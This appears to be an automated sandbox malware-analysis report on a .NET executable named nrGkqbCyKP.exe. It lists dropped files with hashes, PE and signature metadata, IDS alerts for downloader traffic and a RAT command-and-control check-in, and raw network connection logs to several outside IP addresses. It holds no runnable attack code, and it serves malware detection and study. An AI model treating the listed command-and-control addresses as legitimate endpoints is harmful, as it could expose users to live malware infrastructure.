                                                                                                                                                                          Preview:.PNG........IHDR...]................pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx..W.$;.%..={...b.2.p.....+.euO1_.07..Ah*........#D "b&"&.G"".c.1@...>33.~%".j&....{eK../.ML..9...t..5.3.Hd... ..[.....i..T..]... &f.....L..cP.OG...%.......>....D..g"..W.gV.. ..""..1+.^.....{T.......J...>.!.....yq.N../..f.6../...4.EL{0.@7L"F.(ha.y.A..1V....B.L.V..g.D..vs..<t ..'..~`.q!.*.p!$.zD$d.IB...Y.~..B......>...w......9...`..<..EA.....0./....`....BoI..^p!.h....h.<..*...Ls%..g.\.C.i~,.|Uh.VTq.1F.7..{-.6..-.....I....Z.*..%)C.\l\.yoX.KT.....?..k.......9....r..>l.......Z5?..+.\.P1.....!...L6....'.( ....33.$$.......h..1Q.r.e4...IhFI.Z........"d .^.0q.KQ..j..W........#....W..D..0K..h...K.........#MqW3]...\q{..*....R.m...H..."..a6O...pNs._N.......I1.@Nc.}.W0}.... b83.2.b...c.......jod5<F.o@5..Wc.4.Ekr.e.?dXb. .H=..PFU,..(..4....D.uk!lp.P.....(E}.r.......<.9.?.}.....i(.....t.&x.`_e..}./.i.SZ.....;..md'X._...Q..........j..:.G...../6...H..DJ......k..`.a.9..
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2659840
                                                                                                                                                                          Entropy (8bit):6.694083259050332
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:44AD77338A945FE1451861B59267A68D
                                                                                                                                                                          SHA1:F555C3A9AC9BBD5859D1958A844FCDD5E5106339
                                                                                                                                                                          SHA-256:B0D418E149890608CF0BB3DCC7EA23F5AD645F5F598D62143FE3136692FA0962
                                                                                                                                                                          SHA-512:CD02A0354E6B64BC21EC68DF966DA96B09BDC745A0F39B5CE7E3ED6051A2E909BD87E631830E8348F15539B4412A86AF12DAB928B0F19F2C44615E04344F9D77
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.........1..._..._..._...Z..._.e....._...\..._...Z.._...[..._...^..._...[..._.).Z..._......_.l.Z.._....._...^.._.i.Z.._.i._..._.i..._.i.]..._.Rich.._.........................PE..d.....Y..........".................h<.........@..............................(...........`...|.......................................%.X...X.%.T.....(......P'...............(..A.. .!.T.....................!.(.....!.................x............................text...<........................... ..`.rdata..6m.......n..................@..@.data...H6....&..,....&.............@....pdata.......P'.. ....'.............@..@.gfids..@....p(......N(.............@..@.tls..........(......P(.............@....rsrc.........(......R(.............@..@.reloc...A....(..B...T(.............@..B................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1330
                                                                                                                                                                          Entropy (8bit):5.357600602687667
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:5E81AA26543B9563AD2F3DD158C2D251
                                                                                                                                                                          SHA1:8CDDEF245BA7B062E14CD647C625A5E56540D4D7
                                                                                                                                                                          SHA-256:74F0D7AE39AD589C466A7E10EDF16AC218774048E97A92F5C8862715EEEF0685
                                                                                                                                                                          SHA-512:F802BA6E36BDE95C51B5559B6104B8E82E6F8157CF762C7F4BBA0A2E7364809157D08670D6E841A59FD32111B876C7C460B2E05ACED78720F044759D6DBF5BD4
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):107416
                                                                                                                                                                          Entropy (8bit):4.0027810553371355
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:C7DA21EEE346C9B1F6C2DFF06343A728
                                                                                                                                                                          SHA1:5E543725210D2E40684BAAC85D2AA275422090DC
                                                                                                                                                                          SHA-256:2C74BADFD643CC18B4CF759C6F53B144954F1D94615A891FBE3A4BB1DD667679
                                                                                                                                                                          SHA-512:C89240A153E53A4708FF387368F1E319105A63C17B0CC7527DF39D6D6E23021B826058DF7703379620C49E8E7764D05EFB8705081BF209A18086E6411C496DAC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................
                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):107416
                                                                                                                                                                          Entropy (8bit):4.00356758687663
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:EC74591214CB46C771F09420D566D4A7
                                                                                                                                                                          SHA1:766A34BA9227090200E707DEB8CEC779A026BF9C
                                                                                                                                                                          SHA-256:04A7AB5BED18EB273529D616B25E3C5349D59D64D782EC6AD673F7A37839B346
                                                                                                                                                                          SHA-512:8B370183597F2593A33B49CC494003CAD52BDC9159CE56EDDEF8B87C67E5FB95E861749487345104BBE50BFA53D58AFFB4204B7F871E5E74E4144575C10CC0DC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:....h... .......`.......P...........`...X.......]...................8...V.......e.n.-.C.H.;.e.n.-.G.B..............................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................h.u.b.e.r.t.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u......................(..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>...........................................
                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):890
                                                                                                                                                                          Entropy (8bit):5.200723828115115
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:D047794790151D0D0FD0663F374B8DCB
                                                                                                                                                                          SHA1:711250E24C2803BDF513FF925D6A2E36F86134E0
                                                                                                                                                                          SHA-256:ACCE273907F25F9CF1003DFA07E1FE3F4F0C7B38576D1704C25C36EA293D3B43
                                                                                                                                                                          SHA-512:DC02F83DC9FE9D8576C46966D33E3BB0C986ED9F2579FE9D3C856EDA99B6A0B4B7E551048582A0B93A1CD7F8E9356E9AE2ED5EBFABA598954945F1241941638F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"serviceContext":{"serviceActivityId":"1342b09e-98cb-4a90-8d2c-600661184c32","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"1342b09e-98cb-4a90-8d2c-600661184c32|2024-12-18T12:06:58.8777488Z|fabric_msn|EUS2-A|News_20","tier":"\u0000","clientActivityId":"E3E2B315-FC11-446D-8A4F-2D844E2AF606"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false},"isPartial":false}
                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                          Entropy (8bit):4.372177221008353
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:0B75B35444B71EA85B6E125F50EE0F36
                                                                                                                                                                          SHA1:41F315C8B5267729351DEB74C4CCD328BFF7691B
                                                                                                                                                                          SHA-256:C5D29FE16661F6F1C75D0459D6FECAC912AD46C086AED5CC9C2BFBAB644A5E6A
                                                                                                                                                                          SHA-512:D54EB3804FC6A0F04FB57C73C9FE2A0D486746282C71AC1F4AE4097D8471580B3E4AD4791347BCFB1008333E1186FCF9FE2B372C03A00CD77F7185D9CBB1FB09
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:regfD...D....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^..OEQ.................................................................................................................................................................................................................................................................................................................................................{........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                          Entropy (8bit):6.442799286207279
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:nrGkqbCyKP.exe
                                                                                                                                                                          File size:43'976 bytes
                                                                                                                                                                          MD5:84101c768bfd9493c2926066e7aaa6f2
                                                                                                                                                                          SHA1:c2d1e93e44adce0533d063014bb222a4a40d1a37
                                                                                                                                                                          SHA256:d7d253630a5c513c915b0c27650a3bbcd4b1918124f85185f3a330cb34aee89d
                                                                                                                                                                          SHA512:dcb1fe95542e927ca60ef4336be0f039231e7df51fadb1bd50626fd55483a1cf905aa87389e8baba4c7e42f9e5a50e10505345e0ead7a1483068d5e75380886f
                                                                                                                                                                          SSDEEP:384:tEYq2jZpd3ZfAOqE3qlCxdTD+8D8VTH7WTGfZNZXh+NQjsWj/mp+nYJmAM+o/8Es:tEIjLdzI2c3WwNZhzpjuQpAMxkEt2
                                                                                                                                                                          TLSH:2E139E56A7140827EC2B4F7064E286254FB1B6526E81C7CF279CC1960FD378122EE7BB
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....X............"...0..|..........".... ........@.. ....................................`................................
                                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                                          Entrypoint:0x409a22
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0xAF9558D9 [Mon May 7 21:53:29 2063 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                          • 21/02/2024 19:00:00 11/03/2025 19:59:59
                                                                                                                                                                          Subject Chain
                                                                                                                                                                          • CN=\u5e7f\u5dde\u864e\u7259\u4fe1\u606f\u79d1\u6280\u6709\u9650\u516c\u53f8, O=\u5e7f\u5dde\u864e\u7259\u4fe1\u606f\u79d1\u6280\u6709\u9650\u516c\u53f8, L=\u5e7f\u5dde\u5e02, S=\u5e7f\u4e1c\u7701, C=CN, SERIALNUMBER=91440113MA59E8P44H, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.1=\u756a\u79ba\u533a, OID.1.3.6.1.4.1.311.60.2.1.2=\u5e7f\u4e1c\u7701, OID.1.3.6.1.4.1.311.60.2.1.3=CN
                                                                                                                                                                          Version:3
                                                                                                                                                                          Thumbprint MD5:8D48CAE85CC9EF41820ADD2B3D119CA0
                                                                                                                                                                          Thumbprint SHA-1:FDB5017D4C317B2B0514D4183D54B9259317C449
                                                                                                                                                                          Thumbprint SHA-256:4ABC081073ED039FA3B147CFFD22CB96A6BB647AB2858DDB5116FB0B9E82AEB4
                                                                                                                                                                          Serial:07A3EB119B35B4C828E02CBA70E0F57B
                                                                                                                                                                          Instruction
                                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x99ce0x4f.text
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x642.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x88000x23c8
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x99240x38.text
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x20000x7a280x7c0086c1f5ef894b93bd6514c76c9c5c45d7False0.5365108366935484data6.179465929898243IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rsrc0xa0000x6420x8000faf31d3881a8c77c6c6374ae27856e8False0.35888671875data3.6711428682473004IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .reloc0xc0000xc0x20024c9790075c70d65f47af867b4e8339aFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                          RT_VERSION0xa0a00x3b8COM executable for DOS0.4474789915966387
                                                                                                                                                                          RT_MANIFEST0xa4580x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                                          DLLImport
                                                                                                                                                                          mscoree.dll_CorExeMain
                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                          2024-12-18T13:06:08.622312+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84971252.95.160.78443TCP
                                                                                                                                                                          2024-12-18T13:06:22.033948+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.8497183.5.239.146443TCP
                                                                                                                                                                          2024-12-18T13:06:26.185231+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.8497193.5.237.170443TCP
                                                                                                                                                                          2024-12-18T13:06:29.550539+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.8497203.5.237.170443TCP
                                                                                                                                                                          2024-12-18T13:06:37.566996+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84972152.95.162.66443TCP
                                                                                                                                                                          2024-12-18T13:06:41.247971+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.84972252.95.162.66443TCP
                                                                                                                                                                          2024-12-18T13:06:58.025877+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.84972427.50.63.84433TCP
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Dec 18, 2024 13:05:58.746242046 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:05:58.746284962 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:05:58.746368885 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:05:58.787662983 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:05:58.787683964 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:00.616853952 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:00.617187023 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:00.632968903 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:00.633011103 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:00.634089947 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:00.689372063 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:00.694224119 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:00.735366106 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.368019104 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.417311907 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.417336941 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.417363882 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.417386055 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.417416096 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.417442083 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.417468071 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.417485952 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.417504072 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.417546988 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.417546988 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.417567015 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.417587996 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.470514059 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.470532894 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.517416000 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.598316908 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598351002 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598371983 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598440886 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.598440886 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.598531961 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598539114 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598557949 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.598587990 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.598614931 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.598670959 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.642416954 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.653810024 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.653836966 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.653853893 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.653903008 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.653927088 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.653948069 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.653964996 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.653985023 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.654000998 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.654036045 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.654055119 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.654097080 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.661397934 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.661535025 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.661596060 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.661612034 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.704924107 CET49709443192.168.2.83.5.239.146
                                                                                                                                                                          Dec 18, 2024 13:06:01.755434990 CET443497093.5.239.146192.168.2.8
                                                                                                                                                                          Dec 18, 2024 13:06:01.755460024 CET443497093.5.239.146192.168.2.8
